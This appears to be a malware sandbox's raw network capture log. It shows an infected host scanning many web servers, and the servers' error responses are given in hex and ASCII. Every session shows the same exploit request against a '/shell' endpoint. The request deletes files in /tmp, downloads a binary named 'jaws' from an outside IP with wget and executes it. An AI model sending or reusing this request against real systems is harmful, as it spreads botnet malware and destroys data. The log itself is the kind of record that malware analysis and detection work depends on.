                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          559192.168.2.235424452.51.210.25380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:26.161554098 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:26.411801100 CET1286INHTTP/1.1 400
                                                          Content-Type: text/html;charset=utf-8
                                                          Content-Language: en
                                                          Content-Length: 1937
                                                          Date: Tue, 02 Jan 2024 05:25:26 GMT
                                                          Connection: close
                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 30 20 e2 80 93 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 30 20 e2 80 93 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 45 78 63 65 70 74 69 6f 6e 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 49 6e 76 61 6c 69 64 20 63 68 61 72 61 63 74 65 72 20 66 6f 75 6e 64 20 69 6e 20 74 68 65 20 48 54 54 50 20 70 72 6f 74 6f 63 6f 6c 20 5b 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 26 23 34 37 3b 6a 61 77 73 3b 73 68 2b 26 23 34 37 3b 74 6d 70 26 23 34 37 3b 6a 61 77 73 20 5d 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 73 65 72 76 65 72 20 63 61 6e 6e 6f 74 20 6f 72 20 77 69 6c 6c 20 6e 6f 74 20 70 72 6f 63 65 73 73 20 74 68 65 20 72 65 71 75 65 73 74 20 64 75 65 20 74 6f 20 73 6f 6d 65 74 68 69 6e 67 20 74 68 61 74 20 69 73 20 70 65 72 63 65 69 76 65 64 20 74 6f 20 62 65 20 61 20 63 6c 69 65 6e 74 20 65 72 72 6f 72 20 28 65 2e 67 2e 2c 20 6d 61 6c 66 6f 72 6d 65 64 20 72 65 71 75 65 73 74 20 73 79 6e 74 61 78 2c 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 20 6d 65 73 73 61 67 65 20 66 72 61 6d 69 6e 67 2c 20 6f 72 20 64 65 63 65 70 74 69 76 65 20 72 65 71 75 65 73 74 20 72 6f 75 74 69 6e 67 29 2e 3c 2f 70 3e 3c 70 3e 3c 62 3e 45 78 63 65 70 74 69 6f 6e 3c 2f 62 3e 3c 2f 70 3e 3c 70 72 65 3e 6a 61 76 61 2e 6c 61 6e 67 2e 49 6c 6c 65 67 61 6c 41 72 67 75 6d 65 6e 74 45 78 63 65 70 74 69 6f 6e 3a 20 49 6e 76 61 6c 69 64 20 63 68 61 72 61 63 74 65 72 20 66 6f 75 6e 64 20 69 6e 20 74 68 65 20 48 54 54 50 20 70 72 6f 74 6f 63 6f 6c 20 5b 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 26 23 34 37 3b 6a 61 77 73 3b 73 68 2b 26 23 34 37 3b 74 6d 70 26 23 34 37 3b 6a 61 77 73 20 5d 0a 09 6f 72 67 2e 61 70 61 63 68 65 2e 63 6f 79 6f 74 65 2e 68 74 74 70 31 31 2e 48 74 74 70 31 31 49 6e 70 75 74 42 75 66 66 65 72 2e 70 61 72 73 65 52 65 71 75 65 73 74 4c 69 6e 65 28 48 74 74 70 31 31 49 6e 70 75 74 42 75 66 66 65 72 2e 6a 61 76 61 3a 35 35 38 29 0a 09 6f 72 67 2e 61 70 61 63 68 65 2e 63 6f 79 6f 74 65 2e 68 74 74 70 31 31 2e 48 74 74 70 31 31 50 72 6f 63 65 73 73 6f 72 2e 73 65 72 76 69 63 65 28 48 74 74 70 31 31 50
                                                          Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 400 Bad Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 Bad Request</h1><hr class="line" /><p><b>Type</b> Exception Report</p><p><b>Message</b> Invalid character found in the HTTP protocol [157.90.250.90&#47;jaws;sh+&#47;tmp&#47;jaws ]</p><p><b>Description</b> The server cannot or will not process the request due to something that is perceived to be a client error (e.g., malformed request syntax, invalid request message framing, or deceptive request routing).</p><p><b>Exception</b></p><pre>java.lang.IllegalArgumentException: Invalid character found in the HTTP protocol [157.90.250.90&#47;jaws;sh+&#47;tmp&#47;jaws ]org.apache.coyote.http11.Http11InputBuffer.parseRequestLine(Http11InputBuffer.java:558)org.apache.coyote.http11.Http11Processor.service(Http11P
                                                          Jan 2, 2024 06:25:26.411839008 CET831INData Raw: 72 6f 63 65 73 73 6f 72 2e 6a 61 76 61 3a 32 36 33 29 0a 09 6f 72 67 2e 61 70 61 63 68 65 2e 63 6f 79 6f 74 65 2e 41 62 73 74 72 61 63 74 50 72 6f 63 65 73 73 6f 72 4c 69 67 68 74 2e 70 72 6f 63 65 73 73 28 41 62 73 74 72 61 63 74 50 72 6f 63 65
                                                          Data Ascii: rocessor.java:263)org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:63)org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:928)org.apache.tomcat.util.net.NioEndpoint$SocketProcess


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          560192.168.2.2337990104.24.209.20480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:29.545650005 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          561192.168.2.2340034172.67.240.21680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:29.545694113 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          562192.168.2.236034899.142.66.14880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:29.576052904 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:29.732800961 CET307INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:25:29 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          563192.168.2.233792235.183.139.12980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:29.610630989 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          564192.168.2.235081877.129.5.23580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:29.681947947 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:29.919106960 CET315INHTTP/1.1 400 Bad Request
                                                          Server: openresty
                                                          Date: Tue, 02 Jan 2024 05:25:29 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 154
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          565192.168.2.234511852.68.208.13680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:29.707547903 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          566192.168.2.235192085.126.165.10380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:29.714737892 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:29.985243082 CET322INHTTP/1.1 403 Forbidden
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:25:29 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 162
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          567192.168.2.2351858122.219.208.9480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:29.715015888 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          568192.168.2.2340930157.52.181.6180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:29.722171068 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:30.024718046 CET307INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:25:29 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          569192.168.2.235545449.233.248.20280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:29.740901947 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:30.062143087 CET321INHTTP/1.1 400 Bad Request
                                                          Server: nginx/1.24.0
                                                          Date: Tue, 02 Jan 2024 05:25:29 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 157
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          570192.168.2.233710237.1.204.6480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:29.908843994 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:30.150043964 CET404INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:25:30 GMT
                                                          Server: Apache
                                                          Content-Length: 226
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          571192.168.2.235750823.55.68.9880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:29.993837118 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:30.280870914 CET430INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 208
                                                          Expires: Tue, 02 Jan 2024 05:25:30 GMT
                                                          Date: Tue, 02 Jan 2024 05:25:30 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 66 32 30 64 34 63 39 26 23 34 36 3b 31 37 30 34 31 37 33 31 33 30 26 23 34 36 3b 61 61 39 61 31 33 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;3f20d4c9&#46;1704173130&#46;aa9a13f</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          572192.168.2.235323823.221.123.6180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:30.014297009 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:30.313839912 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:25:30 GMT
                                                          Date: Tue, 02 Jan 2024 05:25:30 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 65 62 33 38 61 63 61 26 23 34 36 3b 31 37 30 34 31 37 33 31 33 30 26 23 34 36 3b 31 33 66 31 38 64 66 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;9eb38aca&#46;1704173130&#46;13f18df0</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          573192.168.2.2352802104.126.126.8180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:30.150804043 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:30.393132925 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:25:30 GMT
                                                          Date: Tue, 02 Jan 2024 05:25:30 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 36 33 30 31 30 36 30 26 23 34 36 3b 31 37 30 34 31 37 33 31 33 30 26 23 34 36 3b 32 36 39 30 31 39 38 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;26301060&#46;1704173130&#46;26901988</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          574192.168.2.23334245.135.156.680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:30.155873060 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:30.403831005 CET404INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:25:30 GMT
                                                          Server: Apache
                                                          Content-Length: 226
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          575192.168.2.234447834.88.138.1980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:30.159442902 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:30.410383940 CET88INHTTP/1.0 400 Bad Request
                                                          Data Raw: 43 6c 69 65 6e 74 20 73 65 6e 74 20 61 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 74 6f 20 61 6e 20 48 54 54 50 53 20 73 65 72 76 65 72 2e 0a
                                                          Data Ascii: Client sent an HTTP request to an HTTPS server.


